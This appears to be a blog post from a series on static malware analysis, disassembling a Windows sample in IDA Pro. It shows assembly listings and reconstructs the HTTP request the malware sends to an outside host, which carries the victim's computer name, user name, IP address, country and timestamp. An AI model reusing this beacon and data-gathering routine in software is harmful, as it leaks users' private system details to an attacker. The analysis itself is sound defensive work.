The Usefulness of Strings During Static Malware Analysis (part 4)

Examining a piece of malware for strings (sequences of printable characters) can reveal a few clues about what the malware does, or what it is capable of doing. Part three started disassembling the functions to see how closely their behaviour matched the predictions in part two, but sadly ended just as things were getting exciting. In part four, the saga continues.

Part three disassembled the _WinMain@16() function and saw that it called two other malware functions: sub_401eb0(), which downloaded a file before running it with CreateProcess(); and sub_401c40() which part three didn’t disassemble as it was getting quite long.

Continuing on then, by looking at three small ‘utility’ functions which are called by function sub_401c40(); and then at sub_401c40() itself. I’ll look at the utility functions first so that they don’t interrupt the flow of function sub_401c40()‘s analysis.

sub_401a70()

sub_401a70() referenced the following string:

%04d%02d%02d%02d%02d%02d

It uses the GetLocalTime() Win32 function which stores the local time in to a SystemTime structure. It then proceeds to extract the seconds, minutes, hour, date, month, and year from the SystemTime structure and pushes them on to the stack in that order. It then uses one of the format strings that we identified back in parts one and two, with _sprintf() to format the time information according to the format string above:

.text:00401AC2                 push    offset a04d02d02d02d02 ; "%04d%02d%02d%02d%02d%02d"
.text:00401AC7                 push    ecx             ; char *
.text:00401AC8                 call    _sprintf

The ecx register has been loaded with the address that was passed as a parameter to sub_401a70(). The purpose of sub_401a70() then, is to return the local time, in the format ‘yyyyMMddhhmmss’ (year, month, date, hour, minutes, seconds). Basically it answers the question “What’s the time Mr. Wolf?”

sub_402090()

sub_402090() didn’t reference any strings, but it is called from sub_401c40() and so we’ll have a quick look at it. It calls gethostname() to obtain the local host’s host name. If this fails, sub_402090() returns 0.

Next up, in an interesting turn of events, it calls gethostbyname() to resolve the host name it just received to an IP address. After writing C code myself to determine the local host’s IP address, I suspect that the malware is using the combination of gethostname() and gethostbyname() as an easier alternative to calling GetAdaptersAddresses() and wading through its output. If gethostbyname() fails, sub_402090() returns 0.

sub_402090() then takes the first IP address returned (or returns 1 itself if there wasn’t one) by gethostbyname() and passes it to inet_ntoa() to convert the four byte IP address in to a string (in the familiar dotted quad notation). It copies this IP address string in to the buffer passed as the first parameter to sub_402090(), and then returns 1.

It looks like sub_402090() is using gethostname(), followed by gethostbyname() to determine the local host’s IP address, and then calling inet_ntoa() to convert it to a string (the familiar dotted quad notation) — just the kind of thing that would make it easy to send in an HTTP query string.

sub_402100()

If I remember rightly, and I often don’t as I’m getting older so excuse me a moment while I look it up, sub_402100() was a function that only referenced a couple of short strings:

%20
%s%s

I suspected that this function may use those format strings in an sprintf() call to append two strings in a HTTP URL (as ‘%20’ is how a space character is encoded in URLs). This turned out to be incorrect, so let’s see what sub_402100() actually does.

.text:00402100 String2         = byte ptr -0C00h
.text:00402100 String1         = byte ptr -800h
.text:00402100 var_400         = dword ptr -400h
.text:00402100 lpString1       = dword ptr  4

This list, generated by IDA Pro, is suggesting that sub_402100() has three local variables (two strings, String1 and String2; and an unknown variable, var_400), and one parameter (lpString1) which is a pointer to a string.

The local variables are identified by the negative offsets in the above code, and the parameter by its positive offset. These offsets are typically offsets from either the stack pointer (esp register), as they are in this case, or from the frame pointer (ebp register).

After initialising some variables, it runs the following:

.text:00402126                 mov     eax, [esp+0C10h+lpString1]
.text:0040212D                 lea     ecx, [esp+0C10h+String2]
.text:00402131                 push    eax             ; lpString2
.text:00402132                 push    ecx             ; lpString1
.text:00402133                 call    ebp ; lstrcpyA

This block of instructions is using lstrcpy() to copy the ASCII string passed as a parameter (lpString1) to String2. A trailing ‘A’ is usually used in function names to indicate that the function operates on ASCII strings, rather than on Unicode (indicated by a trailing ‘W’) strings. This is something which until now, I have neglected to point out.

It gets a bit confusing because the comments added by IDA Pro are saying that ecx and eax are the lpString1 and lpString2 parameters to lstrcpyA(), as opposed to the String1, String2, and lpString1 variables that it defined previously.

If you read the instructions, you’ll see that eax contains the first parameter (that is the variable that IDA Pro previously identified as lpString1), and that ecx contains the address of (because of the use of the lea instruction, rather than the mov instruction) String2.

So, after all that, that block of code copies the string passed as a parameter, in to the local String2 variable.

.text:00402135                 lea     edx, [esp+0C10h+String2]
.text:00402139                 push    20h             ; int
.text:0040213B                 push    edx             ; char *
.text:0040213C                 call    _strchr
.text:00402141                 mov     esi, eax

It then calls the _strchr() function to search for the character with ASCII code 0x20 (which is a space character), in the string String2. Or, if you’d rather have that in English, it searches for a space in the string that was passed to it.

If it doesn’t find a space, it jumps down to the end of the function where it copies String2 back in to the buffer (string) that was passed to it as an argument, and returns. Hey, does this string make my buffer look big?

If it did find a space, it zeros the String1 and var_400 variables using repeat prefixes and store string instructions.

.text:00402182                 lea     eax, [esp+0C10h+String2]
.text:00402186                 lea     ecx, [esp+0C10h+String1]
.text:0040218D                 push    eax             ; lpString2
.text:0040218E                 push    ecx             ; lpString1
.text:0040218F                 mov     [esi], bl
.text:00402191                 call    ebp ; lstrcpyA

This time, the IDA Pro provided comments are correct. This block of code is using lstrcpy() to copy the ASCII string String2 to String1.

Believe it or not, the instruction at 0x40218f didn’t just wonder in from the street, but is actually serving a purpose. The ebx register was set to zero using an ‘xor ebx,ebx’ instruction near the beginning of the function, and the bl register is the lower eight bits of the ebx register, hence it is also 0.

The return value from _strchr(), that is the address where the character was found, was saved in to the esi register immediately after the call to _strchr(). Hence the instruction at address 0x40218f is copying a null byte over the top of the space character that _strchr() found in String2. That is, it is terminating String2 at the first space character.

Excuse me a moment while I check how much is left of this function, as it is tea time and I’m getting hungry.

.text:00402193                 lea     edx, [esp+0C10h+String1]
.text:0040219A                 push    offset a20      ; "%20"
.text:0040219F                 push    edx             ; lpString1
.text:004021A0                 call    ds:lstrcatA

Right, sub_402100() then appends the string “%20” to the end of the local variable String1. The IDA Pro comment is saying that edx is the lpString1 parameter to lstrcat(), and not the lpString1 parameter passed as an argument to sub_402100(). This is why it is a good idea to give the generically named variables a more meaningful name once you figure out their purpose.

.text:004021A6                 inc     esi
.text:004021A7                 lea     eax, [esp+0C10h+var_400]
.text:004021AE                 push    esi             ; lpString2
.text:004021AF                 push    eax             ; lpString1
.text:004021B0                 call    ebp ; lstrcpyA

The next block of code increments the esi register which, if you remember, was pointing to the address of the space character in String2. This character is now a null byte, so the inc instruction increments it such that it now points to the first character after the space character (or what is now the null byte) in String2.

It then uses lstrcpy() to copy from this post-space/post-null byte character, in to the local variable var_400. The net effect of this is that it has broken the input string in to two parts — the part before the first space character, which is now in String1 with the string ‘%20’ on the end of it, and the part after the first space character, which is now in var_400.

.text:004021B2                 mov     ecx, 100h
.text:004021B7                 xor     eax, eax
.text:004021B9                 lea     edi, [esp+0C10h+String2]
.text:004021BD                 lea     edx, [esp+0C10h+String1]
.text:004021C4                 rep stosd
.text:004021C6                 lea     ecx, [esp+0C10h+var_400]
.text:004021CD                 lea     eax, [esp+0C10h+String2]
.text:004021D1                 push    ecx
.text:004021D2                 push    edx
.text:004021D3                 push    offset aSS      ; "%s%s"
.text:004021D8                 push    eax             ; char *
.text:004021D9                 call    _sprintf

sub_402100() then uses a ‘rep stosd’ instruction to zero String2, before using _sprintf() and our good old ‘%s%s’ format string, to basically append the string in var_400 to the string in String1, and store the result in String2.

What this function has done, then, is search through the string that it is given, look for a space, and replace it with ‘%20’. ‘%20’ is how a space character is encoded in HTTP URLs… but wait, there’s more:

.text:004021DE                 lea     ecx, [esp+0C20h+String2]
.text:004021E2                 push    20h             ; int
.text:004021E4                 push    ecx             ; char *
.text:004021E5                 call    _strchr
.text:004021EA                 mov     esi, eax
.text:004021EC                 add     esp, 18h
.text:004021EF                 cmp     esi, ebx
.text:004021F1                 jnz     loc_40214E

It then calls _strchr() again to search for another space character in String2 and, if it finds one, jumps back to address 0x40214e to replace it with a ‘%20’. If it doesn’t find one, then we have the grand finale (I always thought that ‘finale’ should have an accent, but apparently not):

.text:004021F7                 mov     eax, [esp+0C10h+lpString1]
.text:004021FE                 lea     edx, [esp+0C10h+String2]
.text:00402202                 push    edx             ; lpString2
.text:00402203                 push    eax             ; lpString1
.text:00402204                 call    ebp ; lstrcpyA

It copies String2 back to the string that was passed in to the function — that is, it overwrites the original string. I told you it was ‘grand’.

Now that we know that function sub_402100() searches through the input string and replaces each occurrence of a space character with the string ‘%20’, I can have some dinner and finish off the star of this article, sub_401c40(), tomorrow.

As much as I’d like to finish it tonight, I have to be up at 04:30 in the morning — the early morning starts required for hot air ballooning here (at least if you want to be able to maintain what little control you have in a balloon), really don’t mix well with spending late nights wading through assembly language code and playing with I.T. stuff.

sub_401c40()

sub_401c40() starts off by initialising variables, before calling socket() to obtain an AF_INET (Internet address family, IPv4) SOCK_STREAM socket. The protocol is unspecified, which usually only leaves TCP as a protocol option in this case, but technically this could include SCTP.

If the socket() call returns -1 (to indicate an error), sub_401c40() returns 0.

.text:00401D0A                 push    80              ; hostshort
.text:00401D0C                 mov     [esp+0C38h+name.sa_family], AF_INET
.text:00401D13                 call    htons
.text:00401D18                 push    offset cp       ; "555.206.117.59"
.text:00401D1D                 mov     word ptr [esp+0C38h+name.sa_data], ax
.text:00401D22                 call    inet_addr

Here we see the malware calling htons() to convert 80 from host byte order (little endian on Intel 80×86 processors) to network byte order (big endian), before using the IP address string that we previously identified.

The IP address string is passed to the inet_addr() function to convert it from a string in to four bytes in network byte order, as they would appear in the header of an IP packet.

Scattered in amongst this code fragment, you see it setting name.sa_family to AF_INET, and name.sa_data to the contents of the ax register. Those of you who have done network programming may recognise these as being elements of a sockaddr structure.

Those two lines are initialising the address family to be AF_INET (Internet, that is IPv4), and the port (the first two bytes of sa_data when the address family is AF_INET) to be the value returned by htons(), that is, 80 in network byte order. 80/tcp (SOCK_STREAM socket type) is the well known port for HTTP, that is, web servers.

.text:00401D27                 lea     ecx, [esp+0C34h+name]
.text:00401D2B                 push    10h             ; namelen
.text:00401D2D                 push    ecx             ; name
.text:00401D2E                 push    esi             ; s
.text:00401D2F                 mov     dword ptr [esp+0C40h+name.sa_data+2], eax
.text:00401D33                 call    connect

There we have a connect() call — didn’t see that coming. The malware is building a sockaddr_in structure (sockaddr structure for the IPv4 address family) with a port number of 80. The return value from inet_addr(), which is still in the eax register, is placed at offset 2 of sockaddr.sa_data, that is sockaddr_in.sin_addr.

The connect() call will hence connect to the remote host, 555.206.117.59, on port 80/tcp. If the connect call fails, it calls closesocket() and returns 0, otherwise, it calls sub_401a70() which as we’ve seen, returns the local time in ‘yyyyMMddhhmmss’ format (year, month, date, hour, minutes, seconds).

Rightio, this is where we get to confirm that data is leaked, and to see what data is leaked.

.text:00401D4F                 lea     edx, [esp+0C34h+dst]
.text:00401D56                 push    edx             ; dst
.text:00401D57                 call    sub_401a70

At this point, sub_401c40() starts gathering data. Here you can see it calling sub_401a70() with the address of (it’s an lea instruction not a mov instruction) the dst variable. As we have seen, this will return with the current time (yyyyMMddhhmmss) in the dst variable.

.text:00401D5F                 lea     eax, [esp+0C34h+LCData]
.text:00401D66                 push    edi             ; cchData
.text:00401D67                 push    eax             ; lpLCData
.text:00401D68                 push    LOCALE_SENGCOUNTRY ; LCType
.text:00401D6D                 push    LOCALE_SYSTEM_DEFAULT ; Locale
.text:00401D72                 call    ds:GetLocaleInfoA

Now it is calling GetLocaleInfo() with its LCType parameter set to LOCALE_SENGCOUNTRY, to find out what the full English name of the country/region is.

.text:00401D78                 lea     ecx, [esp+0C34h+nSize]
.text:00401D7C                 lea     edx, [esp+0C34h+Buffer]
.text:00401D80                 push    ecx             ; nSize
.text:00401D81                 push    edx             ; lpBuffer
.text:00401D82                 call    ds:GetComputerNameA

Reasonably self-explanatory. This will put the computer name in to the variable Buffer, which is nSize bytes large.

.text:00401D88                 lea     eax, [esp+0C34h+stAddrStr]
.text:00401D8C                 push    eax             ; lpstAddrStr
.text:00401D8D                 call    sub_402090

It then calls sub_402090() which obtains the computer’s IP address by using gethostname() to obtain its host name, and then resolving that to an IP address using gethostbyname().

.text:00401D95                 test    eax, eax
.text:00401D97                 jnz     short loc_401DA9
.text:00401D99                 lea     ecx, [esp+0C34h+stAddrStr]
.text:00401D9D                 push    offset aNone    ; "NONE"
.text:00401DA2                 push    ecx             ; lpString1
.text:00401DA3                 call    ds:lstrcpyA

If sub_402090() returned 0, then it copies the string “NONE” in to stAddrStr in place of the IP address.

.text:00401DA9                 lea     edx, [esp+0C34h+nSize]
.text:00401DAD                 lea     eax, [esp+0C34h+var_A00]
.text:00401DB4                 push    edx             ; nSize
.text:00401DB5                 push    eax             ; lpBuffer
.text:00401DB6                 mov     [esp+0C3Ch+nSize], edi
.text:00401DBA                 call    ds:GetUserNameA

Looks like it’s going to leak the current user’s user name too, as this code fragment is storing it in to var_A00.

The malware then uses ‘rep stosd’ followed by ‘stosw’ to zero a local variable.

.text:00401DD9                 lea     ecx, [esp+0C34h+buf]
.text:00401DE0                 push    offset aGetUpdataTpdb_ ; "GET /updata/TPDB.php?"
.text:00401DE5                 push    ecx             ; char *
.text:00401DE6                 stosb
.text:00401DE7                 call    _sprintf

Here we can see another of the strings being used. Given that we have just seen it connect to a remote host on port 80/tcp (well known port for HTTP), and that the string looks like a HTTP request, it is probably pretty safe to assume that it is now putting a HTTP request together.

The stosb instruction is part of the previous rep stosd/stosw code to zero a local variable. Compilers often interleave bits of code for performance reasons (CPU instruction pipelining for instance, where two or more independent instructions run in parallel).

.text:00401DEC                 mov     edx, [esp+0C3Ch+arg_0]
.text:00401DF3                 lea     eax, [esp+0C3Ch+var_A00]
.text:00401DFA                 push    edx
.text:00401DFB                 lea     ecx, [esp+0C40h+Buffer]
.text:00401DFF                 push    eax
.text:00401E00                 lea     edx, [esp+0C44h+stAddrStr]
.text:00401E04                 push    ecx
.text:00401E05                 lea     eax, [esp+0C48h+LCData]
.text:00401E0C                 push    edx
.text:00401E0D                 lea     ecx, [esp+0C4Ch+dst]
.text:00401E14                 push    eax
.text:00401E15                 push    ecx
.text:00401E16                 push    offset a1_003   ; "1.003"
.text:00401E1B                 lea     edx, [esp+0C58h+String2]
.text:00401E22                 push    offset aLg1SLg2SLg3S_0 ; "lg1=%s&lg2=%s&lg3=%s&lg4=%s&lg5=%s&lg6=%s&lg7=%d"
.text:00401E27                 push    edx             ; char *
.text:00401E28                 call    _sprintf

That big lump of code is just pushing the variables for the _sprintf() call on to the stack. This is where you get to work back to see what data is included in the HTTP query string (and hence leaked). This tells us that the query string will be (with the variable names in angled brackets):

lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<stAddrStr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg_0>

_sprintf() will store the resulting string in String2 (it’s first parameter). I’ll recap what data is contained in those variables later as part of the full HTTP request.

.text:00401E2D                 lea     eax, [esp+0C60h+String2]
.text:00401E34                 push    eax             ; lpString1
.text:00401E35                 call    sub_402100

Here it calls sub_402100() which, as we’ve seen, will percent encode any spaces in the String2 string.

.text:00401E3A                 mov     edi, ds:lstrcatA
.text:00401E40                 add     esp, 30h
.text:00401E43                 lea     ecx, [esp+0C34h+String2]
.text:00401E4A                 push    offset String2 ; ” HTTP/1.1\r\nHost: [censored].jp\r\n\r\n”
.text:00401E4F                 push    ecx             ; lpString1
.text:00401E50                 call    edi ; lstrcatA

sub_401c40() then uses lstrcat() to add the protocol version to the request, and to also add a HTTP ‘Host:’ request header. The trailing ‘\r\n\r\n’ represents two new line sequences, which adds one blank line, which in turn signifies the end of the HTTP request headers. Hang in there — we’re almost at the end.

Notice that the preceding block of code has two String2s. The first is a variable, as indicated by the use of an offset from the esp register. The second is a string constant, as indicated by IDA Pro referencing it as ‘offset String2’ and commenting the instruction with the string’s value.

.text:00401E52                 lea     edx, [esp+0C34h+String2]
.text:00401E59                 lea     eax, [esp+0C34h+buf]
.text:00401E60                 push    edx             ; lpString2
.text:00401E61                 push    eax             ; lpString1
.text:00401E62                 call    edi ; lstrcatA

buf contains the start of the HTTP request (‘GET …’), and the variable String2 contains the query string and the rest of the HTTP request. This lstrcat() call will append the variable String2 to buf, thus leaving a complete HTTP request (with headers) in buf.

sub_401c40() then calculates the length of the data in buf (the complete HTTP request) and passes it, along with buf itself, to send() to send it to the remote host. It then calls closesocket() and returns 1 if the send() call succeeded, or 0 if it failed (send() returned -1). This also tells us that it is not expecting to receive any information back from the remote host and that this is simply a request to leak information and possibly to notify of infection.

Summary

Well that certainly wasn’t short, but we now know what another four functions do:

sub_401a70()
Returns the local time in yyyyMMddhhmmss format.
sub_402090()
Returns the local host’s IP address as a string.
sub_402100()
Takes a string and percent encodes any spaces in it.
sub_401c40()
Issues a HTTP request to send information about the infected host.

sub_401c40() sends the following HTTP request:

GET /updata/TPDB.php?lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<ipaddrstr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg0> HTTP/1.1
Host: [censored].jp

Where:

1.003 looks like a version number
<dst> is the local time stamp
<LCData> is the English name of the country/region from the default locale settings
<ipaddrstr> is the host’s IP address
<Buffer> is the host’s computer name as reported by GetComputerName()
<var_A00> is the user name of the currently logged in user
<arg0> is the argument passed to sub_401c40()
The query format string is telling us that this is an integer (the ‘%d’). Going back to the code, sub_401c40() is passed the return value from sub_401eb0(). In part three, we saw that this indicates whether or not the CreateProcess() call created the ACCl3.jpg process.

Just quickly, there was one other function which referenced those strings, but which I haven’t covered: sub_401ae0(). Just looking at it quickly, it appears to be the same as sub_401c40() only it takes the values for query string variables lg1 – lg6 as arguments, and omits lg7. This could be used as a beacon from one of the 100 threads that are started.

The next part will look at some of the remaining functions, although I’m starting to think it won’t go in to as much detail! The remaining functions should be a tad more exciting, as they will be functions that are called from the thread function which starts running after infection.

Malware Musings

Thoughts on malware and malware analysis